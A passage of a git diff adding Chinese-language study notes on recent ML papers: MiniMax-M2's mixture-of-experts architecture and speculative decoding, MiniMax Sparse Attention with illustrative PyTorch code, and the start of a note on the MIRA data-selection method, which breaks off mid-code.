torch.nn as nn + +class MiniMaxMoE(nn.Module): + """ + MiniMax-M2 的 MoE 层简化示意 + + 总专家数: 256 + 每次激活: top-8 + 门控方式: sigmoid(非 softmax) + """ + def __init__(self, d_model=3072, num_experts=256, top_k=8, hidden_dim=8192): + super().__init__() + self.num_experts = num_experts + self.top_k = top_k + + # 门控网络:给每个专家一个独立的激活分数 + self.gate = nn.Linear(d_model, num_experts, bias=True) + + # 256 个专家,每个是一个 FFN + self.experts = nn.ModuleList([ + nn.Sequential( + nn.Linear(d_model, hidden_dim), + nn.GELU(), + nn.Linear(hidden_dim, d_model) + ) + for _ in range(num_experts) + ]) + + def forward(self, x): + """ + x: (batch, seq_len, d_model) + """ + batch, seq_len, d_model = x.shape + + # Step 1: 计算每个专家的门控分数 + # gate_logits: (batch, seq_len, num_experts) + gate_logits = self.gate(x) + + # Step 2: 加上专家特定的偏置(帮助负载均衡) + expert_bias = nn.Parameter(torch.zeros(self.num_experts)) + gate_logits = gate_logits + expert_bias + + # Step 3: Sigmoid 激活(每个专家独立判断) + gate_scores = torch.sigmoid(gate_logits) # (batch, seq_len, num_experts) + + # Step 4: 选出得分最高的 top-k 个专家 + topk_scores, topk_indices = torch.topk(gate_scores, k=self.top_k, dim=-1) + + # Step 5: 加权聚合专家输出 + output = torch.zeros_like(x) + for b in range(batch): + for s in range(seq_len): + for idx in range(self.top_k): + expert_id = topk_indices[b, s, idx].item() + weight = topk_scores[b, s, idx] + expert_out = self.experts[expert_id](x[b, s]) + output[b, s] += weight * expert_out + + return output + +# 使用示例 +moe_layer = MiniMaxMoE(d_model=3072, num_experts=256, top_k=8) +dummy_input = torch.randn(2, 128, 3072) # batch=2, seq=128 +output = moe_layer(dummy_input) +print(f"输入形状: {dummy_input.shape}") +print(f"输出形状: {output.shape}") +# 输出形状: torch.Size([2, 128, 3072]) +``` + +**关键点**:sigmoid 门控 vs softmax 门控的区别在于,sigmoid 不要求所有专家得分之和为 1。这意味着有可能多个专家同时高置信度地被激活,路由过程更平滑。 + +### 4.2 多 Token 预测(MTP)与推测解码 + +M2 不仅预测下一个 token,还同时预测接下来 K 个 token。这在推理时可以用于"推测解码"——主模型一次验证多个候选 token,大幅提升速度。 + +```python +# 简化的 MTP 推测解码示意 +def speculative_decoding_main_model_draft( + main_model, # 主模型(2299 亿参数,256 个专家) + draft_models, # MTP 模块(3 个,通过权重复制初始化) + prompt_tokens, # 输入 token + max_new_tokens=10, + temperature=1.0 +): + """ + M2 的推测解码流程 + + 1. 3 个 MTP 模块并行生成草稿 token + 2. 主模型一次性验证所有草稿 + 3. 接受通过的草稿,拒绝的从第一个失败处重新开始 + + 效果:吞吐量提升,输出质量不变 + """ + generated = list(prompt_tokens) + + for _ in range(max_new_tokens): + # Step 1: MTP 模块生成 K=3 个草稿 token + draft_tokens = [] + for k in range(3): + draft = draft_models[k].generate(generated, max_new_tokens=1) + draft_tokens.extend(draft) + + # Step 2: 主模型一次性验证所有草稿 + # 主模型做一次前向传播,对所有位置给出概率 + main_probs = main_model.forward(generated + draft_tokens) + + # Step 3: 逐个验证草稿 + accepted_count = 0 + for i, draft_token in enumerate(draft_tokens): + # 检查主模型是否接受这个 token + if is_accepted(main_probs, draft_token, temperature): + generated.append(draft_token) + accepted_count += 1 + else: + # 遇到不接受的 token,停止,从主模型采样一个新 token + fallback = sample_from(main_probs[i], temperature) + generated.append(fallback) + break + + # 如果全部接受,直接进入下一轮 + if accepted_count == len(draft_tokens): + continue + + return generated + +def is_accepted(main_probs, draft_token, temperature): + """ + 简单的接受判定:draft token 在主模型概率分布中 + 实际实现会使用均匀随机数与接受率比较 + """ + accept_prob = main_probs[draft_token] + return torch.rand(1) < accept_prob / temperature + +# 使用示意 +# prompt = [128, 256, 512] # 输入 token IDs +# result = speculative_decoding_main_model_draft( +# main_model=model_m2, +# draft_models=[mtp_1, mtp_2, mtp_3], +# prompt_tokens=prompt +# ) +``` + +**为什么 MTP 能加速?** 正常自回归解码每次只能生成 1 个 token,需要 N 次前向传播。MTP 推测解码可以用 3 个轻量 MTP 模块快速生成草稿,然后主模型**一次前向传播**就能验证多个 token。 + +--- + +## 五、M2 的架构参数一览 + +| 参数 | 数值 | +|------|------| +| 总参数量 | 229.9B | +| 每 token 激活参数 | 9.8B | +| 层数 | 62 层 Decoder-only Transformer | +| 隐藏层维度 | 3,072 | +| 词汇表大小 | 200,064 | +| 预训练 Token 数 | 29.2T | +| 上下文窗口 | 192K token | +| 专家总数 | 256 | +| 每 token 激活专家数 | 8 | +| 注意力头数 | 48 query, 8 KV (GQA) | +| 位置编码 | RoPE | + +--- + +## 六、M2.7 的性能表现 + +M2.7 在多个基准测试中与闭源前沿模型竞争: + +**智能体编码**: +- SWE-bench Pro: 56.2(接近 GPT 5.4 的 57.7) +- SWE-bench 多语言: 76.5 +- Multi-SWE-bench: 52.7(超过所有对比模型) +- Terminal-Bench 2.0: 57.0 + +**智能体协作**: +- BrowseComp: 77.8 +- MM Claw: 62.7 +- Toolathlon: 46.3 + +**推理与知识**: +- AIME 2026: 94.2 +- GPQA-Diamond: 89.8 + +值得注意的是,M2.7 只激活约 100 亿参数,就达到了与激活量大一个数量级的模型相当的水平。 + +--- + +## 七、从 M2 到 M2.7 的演进 + +M2 系列的能力是逐步演进的: + +- **M2**:基础版本,在编码任务上已有不错表现 +- **M2.5**:引入更多智能体训练数据,搜索和工具使用能力提升 +- **M2.7**:加入自我进化能力,能自主调试训练、修改自身 scaffold + +从 M2 到 M2.7,在所有 11 个基准测试上都持续提升,其中深度搜索(BrowseComp +33.8)、工具使用(Toolathlon +27.5)和自主 ML 工程(MLE Bench Lite +26.6)的提升最为显著——这正是新数据管线重点投入的方向。 + +--- + +## 八、关键设计选择背后的思考 + +### 8.1 为什么坚持全注意力(Full Attention)而不是高效注意力? + +MiniMax 之前尝试过混合注意力(部分层用滑动窗口注意力 SWA),但在大规模实验中发现了问题: + +1. **评估困难**:标准基准测不出来差距,但在复杂多跳推理上暴露了缺陷 +2. **基础设施不成熟**:线性注意力在低精度存储下敏感,不支持前缀缓存 +3. **长上下文受损**:在超过 32K token 的任务上,SWA 明显不如全注意力 + +实验数据(预训练阶段): + +| 基准 | 全注意力 | 混合 SWA | 差距 | +|------|---------|---------|------| +| HELMET ICL | 75.8 | 72.7 | -3.1 | +| RULER 128K CWE | 90.0 | 72.0 | **-18.0** | +| MTOB 翻译 BLEURT | 60.0 | 45.0 | -15.0 | + +长上下文检索能力的损失非常显著。 + +### 8.2 为什么用 Sigmoid 门控而非 Softmax? + +Softmax 门控有一个"零和博弈"问题——某个专家得分高了,其他专家的得分必然降低。Sigmoid 让每个专家独立判断,路由更平滑,且配合专家偏置项(expert bias)可以大幅减少对辅助负载均衡损失的依赖。 + +--- + +## 九、学习要点总结 + +1. **MoE 的核心价值**:用稀疏激活实现"大模型容量 + 小模型成本"的兼得 +2. **智能体数据 > 静态数据**:模型在真实环境中完成任务的记录,比单纯阅读文本更能提升实际能力 +3. **训练-推理-智能体解耦**:Forge 系统的三大模块各自独立扩展,是处理异构智能体的关键架构决策 +4. **Windowed FIFO 调度**:在严格 FIFO(保分布一致性)和完全贪婪(保吞吐)之间找到平衡点 +5. **前缀树合并**:共享前缀只算一次,训练加速最高达 40 倍,且数学上等价于独立样本训练 +6. **自我进化**:M2.7 已能自主调试训练、修改 scaffold,这是减少人工迭代瓶颈的重要一步 + +--- + +## 十、延伸思考 + +这篇论文最引人深思的地方是"mini activations"这个理念的彻底贯彻——不仅是模型架构层面少激活参数,还包括: + +- 数据层面:用智能体自己产生的高质量轨迹,而非海量低质网页 +- 训练层面:用解耦架构和高效调度,而非暴力堆算力 +- 推理层面:用 MTP 推测解码,而非单纯增大模型 + +这种"处处做减法,处处换质量"的设计哲学,或许比具体的技术细节更值得学习。 diff --git a/src/content/docs/papers/minimax-sparse-attention.md b/src/content/docs/papers/minimax-sparse-attention.md new file mode 100644 index 000000000..9a4ba2ca4 --- /dev/null +++ b/src/content/docs/papers/minimax-sparse-attention.md @@ -0,0 +1,327 @@ +--- +title: MiniMax Sparse Attention — 用"选重点区块"打破注意力二次方瓶颈 +来源: 'https://arxiv.org/abs/2606.13392' +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +## 是什么 + +MiniMax Sparse Attention(简称 MSA)是 MiniMax 和北京大学联合提出的一种**稀疏注意力机制**,构建在 Grouped Query Attention(GQA)之上。它的核心思路很简单:对于每个查询 token,不再让它去"看"上下文里的所有历史 token,而是先用一个超轻量的 Index Branch 快速打分,选出最关键的 Top-k 个 KV 区块(block),然后 Main Branch 只在这 k 个区块上做精确的 softmax 注意力计算。 + +在 109B 参数的 MoE 模型上、1M 上下文长度时,MSA 将每 token注意力计算量降低了 28.4 倍;配合专门设计的 GPU 内核,在 H800 上预填充阶段加速 14.2 倍、解码阶段加速 7.6 倍。模型代码在 GitHub,生产级模型 MiniMax-M3 已在 HuggingFace 开源。 + +## 日常类比 + +想象你在读一本 100 万字的小说,突然要回答"主角在第三章做了什么"。 + +**标准注意力(Full Attention)** 的做法是:把整本小说从头到尾重读一遍,给每一句话都做一个"相关度评分",然后加权汇总。这很精确,但太慢了——读一遍就要花 quadratic 时间。 + +**MSA 的做法** 类似人类的阅读策略: + +1. 先用一个快速扫描(Index Branch):整本书分成 7812 个 128 字区块,每个区块给一个"大概相关度"分数——这一步很快,因为每个区块只看一个代表分数。 +2. 选出分数最高的 16 个区块(Top-k selection),再加上当前所在区块附近的一个本地区块,确保你不会丢失即时上下文。 +3. 最后只在选中的这 16 个区块里做精细阅读(Main Branch),用标准 softmax 注意力。 + +结果是:你几乎不牺牲理解质量,但阅读速度提升了十几倍。 + +## 核心概念 + +### 概念一:分块(Block)与 GQA 分组 + +MSA 不逐个 token 做选择,而是把 KV 序列切分成固定大小的区块(block size B_k = 128)。每个区块包含 128 个 token 的 key 和 value。 + +在 GQA 架构中,多个 query head 共享同一个 key-value head,组成一个 GQA group。MSA 在每个 GQA group 级别做块选择——同一个 group 内的所有 query head 共享同一组被选中的 block。 + +### 概念二:Index Branch — 轻量打分器 + +Index Branch 引入两组可学习参数: +- 一个 index query head per GQA group:Q_idx = X @ W_q_idx +- 一个共享的 index key head:K_idx = X @ W_k_idx + +对于查询位置 i 和 group r,先计算 token 级别的分值,再用**块级最大值池化**聚合到 block 级别: + +``` +S_idx = (Q_idx @ K_idx^T) / sqrt(d_idx) +M_block = max_pool(S_idx, block_size=128) # 每个 block 取最大值作为分数 +I = TopK(M_block, k=16) # 选出分数最高的 16 个 block +``` + +关键细节:无论分数如何,当前查询所在的那个本地区块总是被强制包含,防止模型完全忽略即时上下文。 + +### 概念三:Main Branch — 精确计算 + +Main Branch 用标准缩放点积注意力,但只作用于 Index Branch 选中的 block: + +``` +O = softmax(Q @ K[selected_blocks] / sqrt(d_h)) @ V[selected_blocks] +``` + +查询的开销从 O(N) 降到 O(k * B_k) = O(16 * 128) = O(2048),与序列长度 N 无关。 + +### 概念四:KL Loss 训练 Index Branch + +Top-k 选择是不可导的,不能直接用语言模型损失训练 Index Branch。MSA 用一个额外的 KL 散度损失来对齐: + +- Index Branch 的输出分布 P_idx 作为学生 +- Main Branch 在选中 token 上的注意力分布作为老师(带 stop-gradient) + +``` +L_KL = KL(stop_grad(P_main) || P_idx) +``` + +同时,Index Branch 的输入 X 也被 stop-gradient 隔离,确保 KL 损失只更新 Q_idx 和 K_idx 这两个小矩阵,不污染主模型的参数。 + +### 概念五:Warmup 两阶段训练 + +1. **Warmup 阶段**(前 40B token):两个分支都用完整注意力,用 L_KL 初始化 Index Branch +2. **Sparse 阶段**(剩余 2.6T token):切换到稀疏注意力,Index Branch 控制 Top-k 选择 + +### 概念六:GPU 内核协同设计 + +MSA 不只是算法,还配套设计了专用 GPU kernel: + +- **无 exp 的 Top-k**:因为 softmax 是保序的,直接对原始分数排序就能得到正确的 Top-k 索引,省掉 max/exp/sum 步骤 +- **KV-outer 迭代**:按 KV block 遍历,收集查询到每个 block 的 token,充分利用 Tensor Core +- **预调度分块**:对热门 block(被大量 query 选中)用分块策略分散到多个 CTA,避免热点瓶颈 +- **两阶段前向**:先用一个 kernel 计算各 partial 的局部归一化结果,再用第二个 kernel 合并 + +## 计算复杂度对比 + +| 组件 | GQA | MSA | +|------|-----|-----| +| 主要计算 | 2 * H_q * d_h * N^2 | 4 * H_q * d_h * N * k * B_k | +| 额外开销 | 无 | H_kv * d_idx * N^2(Index Branch) | + +当 k * B_k << N 时,Main Branch 的计算量从 O(N^2) 降到 O(N),总计算量大幅降低。 + +## 代码示例 + +### 示例一:Index Branch 的伪代码实现 + +```python +class MiniMaxSparseAttention(nn.Module): + """MSA 核心结构——Index Branch + Main Branch""" + + def __init__(self, d_model, num_kv_heads, head_dim, block_size=128, top_k=16): + super().__init__() + self.num_kv_heads = num_kv_heads + self.block_size = block_size + self.top_k = top_k + self.d_idx = 64 # index head 维度 + + # 标准 GQA 投影 + self.q_proj = nn.Linear(d_model, num_kv_heads * head_dim) + self.k_proj = nn.Linear(d_model, num_kv_heads * head_dim) + self.v_proj = nn.Linear(d_model, num_kv_heads * head_dim) + + # Index Branch:每组一个 query head,共享一个 key head + self.q_idx_proj = nn.Linear(d_model, num_kv_heads * self.d_idx) + self.k_idx_proj = nn.Linear(d_model, self.d_idx) # 共享 + + def forward(self, hidden_states): + """ + hidden_states: (seq_len, d_model) + 返回: (seq_len, d_model) + """ + seq_len = hidden_states.shape[0] + + # ---- Main Branch 投影 ---- + q = self.q_proj(hidden_states) # (seq_len, num_kv_heads, d_h) + k = self.k_proj(hidden_states) # (seq_len, num_kv_heads, d_h) + v = self.v_proj(hidden_states) # (seq_len, num_kv_heads, d_h) + + # ---- Index Branch ---- + # 输入用 stop-grad 隔离 + hidden_detached = hidden_states.detach() + q_idx = self.q_idx_proj(hidden_detached) # (seq_len, num_kv_heads, d_idx) + k_idx = self.k_idx_proj(hidden_detached) # (seq_len, 1, d_idx) + + # 按 GQA group 计算 index 分数 + # q_idx: (seq_len, num_kv_heads, d_idx) + # k_idx: (seq_len, 1, d_idx) -> expand 到 (seq_len, num_kv_heads, d_idx) + k_idx = k_idx.expand(-1, q_idx.shape[1], -1) + + # token-level 分数: (seq_len, num_kv_heads, seq_len) + scores_idx = torch.matmul(q_idx, k_idx.transpose(1, 2)) / (self.d_idx ** 0.5) + + # 用 -inf 掩码保证因果性 + causal_mask = torch.tril( + torch.ones(seq_len, seq_len, device=hidden_states.device) + ) + scores_idx = scores_idx.masked_fill(causal_mask == 0, float('-inf')) + + # ---- 块级最大值池化 ---- + num_blocks = (seq_len + self.block_size - 1) // self.block_size + block_scores = self._block_max_pool(scores_idx, self.block_size) + # block_scores: (seq_len, num_kv_heads, num_blocks) + + # ---- Top-k 选择 ---- + # 每个查询位置,对每个 GQA group 选 top-k 个 block + indices = torch.topk(block_scores, k=self.top_k, dim=-1).indices + # indices: (seq_len, num_kv_heads, top_k) + + # 强制加入本地 block + local_block = (torch.arange(seq_len, device=hidden_states.device) // self.block_size).unsqueeze(-1) + local_block = local_block.unsqueeze(-1).expand(-1, -1, self.top_k) + # 把 local block 替换 top_k 中分数最低的那个 + indices = self._force_local_block(indices, local_block) + + # ---- Main Branch 稀疏注意力 ---- + output = self._sparse_attention(q, k, v, indices, num_blocks) + + # ---- KL Loss(训练时) ---- + kl_loss = self._compute_kl_loss(q_idx, k_idx, q, k, indices) + + return output, kl_loss + + def _block_max_pool(self, scores, block_size): + """将 token-level 分数聚合到 block level,每个 block 取最大值""" + seq_len = scores.shape[0] + num_blocks = (seq_len + block_size - 1) // block_size + + padded = F.pad(scores, (0, num_blocks * block_size - seq_len)) + # reshape 成 (seq_len, num_kv_heads, num_blocks, block_size) + padded = padded.view(seq_len, scores.shape[1], num_blocks, block_size) + # 因果性:当前 block 内只看到 <= 查询位置的部分 + causal_local = torch.tril(torch.ones(block_size, block_size)) + causal_local = causal_local.bool() + padded = padded.masked_fill(~causal_local.unsqueeze(0).unsqueeze(0), float('-inf')) + + # 每 block 取最大值 + block_scores = padded.max(dim=-1).values # (seq_len, num_kv_heads, num_blocks) + return block_scores + + def _force_local_block(self, indices, local_block): + """用 local block 替换 top-k 中分数最低的那个""" + # 简单策略:找到 top_k 中每个查询位置的第一个位置,用 local block 替换 + indices[:, :, 0] = local_block.squeeze(-1) + return indices + + def _sparse_attention(self, q, k, v, indices, num_blocks): + """对选中的 block 执行标准 softmax 注意力""" + seq_len = q.shape[0] + output = torch.zeros_like(q) + + for head in range(q.shape[1]): + q_head = q[:, head, :] # (seq_len, d_h) + k_head = k[:, head, :] + v_head = v[:, head, :] + + attn_output = torch.zeros_like(q_head) + for i in range(seq_len): + # 取当前 block 的 top-k 索引 + block_ids = indices[i, head, :] # (top_k,) + # 展开成 token 索引 + token_ids = [] + for bid in block_ids: + start = bid * self.block_size + end = min(start + self.block_size, i + 1) # 因果性 + token_ids.extend(range(start, end)) + token_ids = torch.tensor(token_ids, device=q.device) + + if len(token_ids) == 0: + continue + + # 标准注意力 + scores = torch.matmul(q_head[i], k_head[token_ids].T) / (self.q_proj.out_features ** 0.5) + attention = F.softmax(scores, dim=-1) + attn_output[i] = torch.matmul(attention, v_head[token_ids]) + + output[:, head, :] = attn_output + + return output + + def _compute_kl_loss(self, q_idx, k_idx, q_main, k_main, indices): + """计算 Index Branch 与 Main Branch 的 KL 散度""" + # 这里省略完整实现——核心是对选中的 token 集合, + # 比较 P_idx(index 分数归一化)和 P_main(main 注意力归一化) + return 0.0 # placeholder +``` + +### 示例二:使用 MSA 的模型推理配置 + +```python +"""在实际项目中,MSA 作为注意力层被嵌入到 MoE 模型中""" + +from transformers import PretrainedConfig, PreTrainedModel + +class MSAConfig(PretrainedConfig): + """MSA 模型的配置——来自 MiniMax-M3 的实际参数""" + model_type = "minimax_m3" + + def __init__(self, **kwargs): + super().__init__(**kwargs) + # 模型结构 + self.num_attention_heads = 64 # query heads + self.num_key_value_heads = 4 # KV heads, GQA ratio = 16 + self.hidden_size = 3072 + self.head_dim = 128 + self.rope_dim = 64 + self.num_hidden_layers = 41 # 3 dense + 38 MoE + + # MSA 参数 + self.msa_block_size = 128 + self.msa_top_k = 16 + self.msa_index_dim = 64 + + # MoE 参数 + self.num_experts = 128 + self.num_experts_per_tok = 4 + self.shared_expert = True + + # 训练 + self.vocab_size = 200_000 + self.warmup_tokens = 40_000_000_000 # 40B + + +# 推理时,MSA 的使用方式和普通注意力层一样透明: +def run_inference_with_msa(): + """从 HuggingFace 加载使用 MSA 的模型——对调用者完全透明""" + from transformers import AutoModelForCausalLM + + model = AutoModelForCausalLM.from_pretrained("MiniMaxAI/MiniMax-M3") + config = MSAConfig() + + # 输入长上下文文本(例如百万字代码仓库) + prompt = "请分析以下代码仓库的架构..." + + # 推理——MSA 在后台自动做 block 选择和稀疏计算 + # 用户不需要知道、也不需要关心 MSA 的内部细节 + inputs = model.tokenizer(prompt, return_tensors="pt") + outputs = model.generate(**inputs, max_new_tokens=512) + + return model.tokenizer.decode(outputs[0], skip_special_tokens=True) + +# 性能预期(H800 GPU,1M 上下文): +# 预填充阶段:比 GQA 快 14.2 倍 +# 解码阶段:比 GQA 快 7.6 倍 +# 每 token 注意力计算量:降低 28.4 倍 +``` + +## 关键设计决策一览 + +| 设计选择 | MSA 的做法 | 原因 | +|---------|-----------|------| +| 粒度 | 块级(128 token/block) | 比 token 级高效,比 block 级更灵活 | +| k 值 | 16 个 block | 兼顾稀疏度和质量,适配各种 GPU | +| Index Branch 参数量 | 每 group 一组 Q/K | 极轻量,几乎零额外开销 | +| 梯度隔离 | stop-gradient 切断 X → Index | KL 损失不污染主模型参数 | +| 训练策略 | 先 full attn warmup → 后 sparse | 避免早期随机选择导致崩溃 | +| 本地区块 | 强制包含 | 保证即时上下文不被遗漏 | +| GPU 内核 | exp-free Top-k + KV-outer | 消除 softmax 冗余,提升 Tensor Core 利用率 | + +## 实验结果摘要 + +在 109B MoE 模型上、3T token 训练预算下: + +- **MSA-PT**(从零训练):在数学、图像、视频、长上下文检索等多项基准上**超过**了 Full Attention 基线 +- **MSA-CPT**(从已有检查点继续训练):在文本、代码、困惑度上**接近** Full Attention,适合已有模型的稀疏化改造 +- 训练损失曲线和梯度范数与 Full Attention **几乎重合**,训练稳定性良好 +- Block recall 和 score recall 在训练中保持稳定,说明 Index Branch 持续选择到重要的 block + +## 总结 + +MSA 的设计哲学是"奥卡姆剃刀"——去掉所有非必要组件,只保留最核心的部分:一个超轻量的 Index Branch 做粗筛,一个标准 Main Branch 做精算。它不引入新的数学运算,完全兼容现有 CUDA 生态,因此可以高效部署在各种 GPU 上。对于需要百万 token 上下文的应用(agent 工作流、代码仓库推理、持久记忆等),MSA 是目前最简洁实用的稀疏注意力方案之一。 diff --git a/src/content/docs/papers/mira-rubric.md b/src/content/docs/papers/mira-rubric.md new file mode 100644 index 000000000..d5f4dadc3 --- /dev/null +++ b/src/content/docs/papers/mira-rubric.md @@ -0,0 +1,285 @@ +--- +title: MIRA — 中期训练中的来源感知 Rubric 锚定数据筛选 +来源: https://arxiv.org/abs/2605.30288 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:同一套评分表评不了所有作业 + +想象你是教研组长,要在开学前从**海量练习册**里挑出最值得练的题,但练习册来源极杂: + +- 有的是**纯代码文档**(像 GitHub 仓库快照) +- 有的是**问答对**(题目 + 参考答案) +- 有的是 **Agent 轨迹**(多轮对话 + 工具调用 JSON) + +如果你拿一张**全局评分表**——「文笔流畅、逻辑清晰、信息量大」——去筛 Agent 轨迹,很可能把「话术漂亮但工具调用格式错误」的样本留下;用「困惑度(PPL)」筛一切,长轨迹会被系统性压低分数,和「质量」混为一谈。 + +MIRA 的做法像**先分组出题、再各组定制 rubric、最后雇便宜助教批量打分**: + +1. 把 21 种来源按内容嵌入聚成 **5 个能力组**(Agent / QA / Text 等) +2. 请一位**前沿教师模型**自由写出「这一组到底该看什么」→ 聚类成每组固定的 **anchor rubric(锚定评分维度)** +3. 教师按锚定维度给约 **200 万条**样本打结构化分 → 蒸馏成每组一个**轻量学生打分器** +4. 全库数千万条用学生快速打分 → **可靠性掩码**去掉不靠谱的维度 → **按来源/组保留阈值**筛出最终语料 + +论文核心结论:**用一半 token(25B vs 50B)的中期训练数据,九项代码 benchmark 的宏平均可与「不过滤全量 50B」持平**,且优于 PPL、DSIR、DataMan、随机采样等基线。 + +--- + +## 是什么 + +**MIRA**(**Mi**d-training **R**ubric **A**nchoring for Source-Aware Data Selection,Wang et al., 2026)是面向 **heterogeneous mid-training(异构中期训练)** 语料的**来源感知质量筛选框架**。 + +| 阶段 | 训练目标 | 数据特点 | 筛选难点 | +|------|----------|----------|----------| +| 预训练 | 通用语言建模 | 规模大、格式相对同质 | PPL / 去重可扩展 | +| **中期训练** | 仍是大规模 LM loss,但**面向下游能力** | Web、代码、数学、指令、推理链、Agent 轨迹混在一起 | 需要**语义标准**,且标准因来源而异 | +| 后训练(SFT/RL) | 指令跟随 / 偏好对齐 | 格式较标准 | 固定 rubric、LLM-as-judge 成熟 | + +MIRA 把 **rubric 发现** 和 **可扩展打分** 拆开:前沿教师只负责「这一组该评什么」,真正扫全库的是蒸馏后的学生模型。 + +--- + +## 为什么重要 + +1. **中期训练已成标配**:在预训练与 SFT/RL 之间,用大规模 curated mixture 补强代码、推理、长上下文、工具使用等能力(Qwen、DeepSeek-R1、CWM 等路线均涉及)。 +2. **旧方法两头不靠**:预训练筛选(PPL、DSIR、梯度影响)信号隐式、不懂「Agent 轨迹是否有效恢复错误」;后训练筛选(DataMan、QuRating)假设**固定全局 rubric**,难以覆盖 21 种异构来源。 +3. **算力即数据**:论文在 **Qwen2.5-Coder-14B** 上 mid-train **50B token**;MIRA-Group 只用 **25B** 精选子集,SFT 后 **Macro Avg. 64.20**,超过 Random(63.23)、DataMan(63.01)、DSIR(59.55),并逼近 Raw Mixture 50B 的 63.83。 +4. **可解释**:分数来自组内多维 rubric + 理由,而非单一标量;案例研究显示低分轨迹多因 **invalid tool-call payload、无 error recovery**,而非「写得不好看」。 + +--- + +## 核心概念 + +### 1. Mid-training(中期训练) + +介于大规模预训练与任务后训练之间的阶段:仍用 next-token prediction、token 量级接近预训练,但混合料**刻意偏向能力域**(代码、数学、长文、Agent 等)。与「窄域继续预训练」不同,它要在**保持通用性**的同时拉高特定能力。 + +### 2. Self-Anchored Rubric Discovery(自锚定 Rubric 发现) + +**不做**人工写「代码质量 5 维度、Agent 质量 8 维度」。流程: + +1. 对每个来源采样,用内容嵌入把 **21 个来源** 聚成 **5 个组** +2. 教师模型对组内样本 **自由形式评判**:自己提出维度名、打分、写理由(无预设 rubric) +3. 解析为 `(dimension_name, reason)` 判点,嵌入后聚类;每个簇取距质心最近的判点作为 **anchor dimension** +4. 每组得到一组固定锚定维度(实现中每组约 **15 个 anchor**),构成该组的评分空间 + +直觉:rubric 来自教师**实际怎么评**,不是作者拍脑袋的 normative checklist。 + +### 3. Anchored Judge Distillation(锚定评判蒸馏) + +自由形式评判每条记录的维度集合不同,无法直接当监督信号。固定 anchor 后: + +- 教师对更大样本集,在**每个 anchor** 上打数值分 + 简短理由 +- 约 **200 万条** teacher-scored 记录 → 训练集 / 验证集 +- 每组训练一个 **group-specific student**(论文用 **Qwen3.5-35B-A3B-Base** 全参微调;教师为 **Kimi-K2.6**) +- 学生输出:每个 anchor 的 score + rationale,可解析为多维向量 + +**每组一个学生**,因为各组 anchor 语义空间不同;比「一个万能打分器」拟合更稳。 + +### 4. Source-Conditioned Reliability Aggregation(来源条件可靠性聚合) + +学生并非在每个「来源 × 维度」上都可靠。在验证集上算教师–学生 **MAE** 与 **Spearman**,低于阈值的 `(source, dimension)` 记入掩码 \(M^{(g)}_{s,d}=0\)。 + +聚合单条记录分数时:**只对掩码为 1 的维度做 trimmed mean**。掩码在聚合阶段后验应用,**不改学生 prompt**——避免改 prompt 导致剩余维度分数联合分布漂移。 + +### 5. Source-Preserving Selection(保来源筛选) + +不同来源分数分布的均值/方差不同;**单一全局阈值**会先删掉低均值来源 → **能力域被整类砍掉**。三种变体: + +| 变体 | 阈值策略 | 特点 | +|------|----------|------| +| MIRA-Global | 全库一个 cutoff | 易偏向高分分布组 | +| **MIRA-Group**(默认) | 每个来源组内保留 | 平衡质量与能力覆盖 | +| MIRA-Source | 每个来源单独 cutoff | 保多样性最强,小来源更噪 | + +--- + +## 实验设置速览 + +- **基座**:Qwen2.5-Coder-14B +- **Mid-training**:Megatron-LM,约 50B token,seq len 128k,BF16 +- **数据**:代码向中期训练混合,**21 sources → 5 groups**(含 Agent 轨迹、QA、Text 等) +- **SFT**:固定 40 万条指令样本,超参一致,差异仅来自 mid-train 数据 +- **评测**:9 个 benchmark,分四类宏平均——代码生成(MBPP、MBPP+、BCB、LCB)、多语言 Multipl-E(8 语言)、SQL(Spider + BIRD 可执行准确率)、SWE-Multi + +**主要数字(25B 子集,Table 1 Macro Avg.)**: + +| 方法 | Macro Avg. | +|------|------------| +| DSIR | 59.55 | +| PPL | 54.73 | +| Random | 63.23 | +| DataMan | 63.01 | +| MIRA-Group | **64.20** | +| Raw Mixture(50B,无筛选) | 63.83 | + +--- + +## 代码示例 1:模拟「自锚定 Rubric 发现」 + +下面用 Python 演示**分组 → 教师自由判点 → 聚类成 anchor** 的逻辑(教学伪代码,非官方实现): + +```python +from dataclasses import dataclass +from sklearn.cluster import AgglomerativeClustering +import numpy as np + +@dataclass +class JudgmentPoint: + dimension: str + reason: str + score: float + embedding: np.ndarray # 对 (dimension + reason) 的向量 + +def cluster_sources_by_embedding(source_means: dict[str, np.ndarray], n_groups: int): + """按来源内容嵌入的均值向量,把 21 个来源聚成 5 组。""" + sources = list(source_means.keys()) + X = np.stack([source_means[s] for s in sources]) + labels = AgglomerativeClustering(n_clusters=n_groups).fit_predict(X) + groups: dict[int, list[str]] = {i: [] for i in range(n_groups)} + for src, g in zip(sources, labels): + groups[g].append(src) + return groups + +def discover_anchor_rubrics(free_form_judgments: list[JudgmentPoint], k_anchors: int = 15): + """ + 教师对组内样本的自由评判 → 解析为 JudgmentPoint → 聚类 → 每簇一个 anchor。 + """ + emb = np.stack([j.embedding for j in free_form_judgments]) + cluster_ids = AgglomerativeClustering(n_clusters=k_anchors).fit_predict(emb) + anchors = [] + for cid in range(k_anchors): + members = [j for j, c in zip(free_form_judgments, cluster_ids) if c == cid] + centroid = np.mean([m.embedding for m in members], axis=0) + # 选距质心最近的判点作为该维度的 anchor 名称与示例理由 + best = min(members, key=lambda m: np.linalg.norm(m.embedding - centroid)) + anchors.append({"name": best.dimension, "exemplar_reason": best.reason}) + return anchors + +# 示例:Agent 组可能发现 tool_call_validity、error_recovery 等 anchor; +# Text 组可能是 coherence、technical_depth 等——同一套全局 rubric 无法同时覆盖。 +``` + +--- + +## 代码示例 2:可靠性掩码 + 组内保留阈值 + +演示 **source-conditioned reliability** 与 **MIRA-Group** 筛选: + +```python +from typing import Dict, List, Tuple + +def reliability_mask( + teacher_scores: Dict[Tuple[str, str], float], + student_scores: Dict[Tuple[str, str], float], + mae_thresh: float = 0.35, + spearman_thresh: float = 0.4, +) -> Dict[Tuple[str, str], bool]: + """ + 对每个 (source, dimension) 在验证集上算 MAE / Spearman。 + 低于阈值 → 掩码为 False,不参与聚合。 + """ + from scipy.stats import spearmanr + mask = {} + pairs = set(teacher_scores.keys()) & set(student_scores.keys()) + by_pair = {} + for key in pairs: + by_pair.setdefault(key, []).append((teacher_scores[key], student_scores[key])) + for key, pairs_vals in by_pair.items(): + t = [p[0] for p in pairs_vals] + s = [p[1] for p in pairs_vals] + mae 